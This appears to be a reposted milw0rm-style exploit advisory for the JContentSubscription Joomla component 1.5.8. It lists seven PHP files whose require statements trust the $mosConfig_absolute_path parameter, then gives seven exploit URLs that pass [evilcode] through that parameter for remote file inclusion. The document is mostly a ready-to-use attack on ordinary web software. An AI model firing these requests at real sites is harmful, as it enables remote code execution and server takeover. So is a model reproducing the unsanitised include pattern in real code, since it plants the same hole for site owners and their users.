LFI to RCE via access_log injection

JContentSubscription Joomla Component 1.5.8 - Multiple RFI


[o] JContentSubscription Joomla Component 1.5.8 Multiple Remote File Include Vulnerability
Software : com_jcs version 1.5.8 - payable component
Vendor : www.joomlaequipment.com
Author : NoGe


[o] Vulnerable file
administrator/components/com_jcs/jcs.function.php
require_once( $mosConfig_absolute_path.'/components/com_jcs/languages/english.php' );
administrator/components/com_jcs/view/add.php
require( $mosConfig_absolute_path.'/components/com_jcs/languages/english.php' );
administrator/components/com_jcs/view/history.php
require( $mosConfig_absolute_path.'/components/com_jcs/languages/english.php' );
administrator/components/com_jcs/view/register.php
require( $mosConfig_absolute_path.'/components/com_jcs/languages/english.php' );
administrator/components/com_jcs/views/list.sub.html.php
require_once( $mosConfig_absolute_path ."/administrator/components/com_jcs/menubar.php" );
administrator/components/com_jcs/views/list.user.sub.html.php
require_once( $mosConfig_absolute_path ."/administrator/components/com_jcs/menubar.php" );
administrator/components/com_jcs/views/reports.html.php
require_once( $mosConfig_absolute_path ."/administrator/components/com_jcs/menubar.php" );


[o] Exploit
http://localhost/path/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=[evilcode]
http://localhost/path/administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=[evilcode]
http://localhost/path/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=[evilcode]
http://localhost/path/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=[evilcode]
http://localhost/path/administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=[evilcode]
http://localhost/path/administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=[evilcode]
http://localhost/path/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=[evilcode]


[o] Publish
http://milw0rm.com/exploits/4508


Comments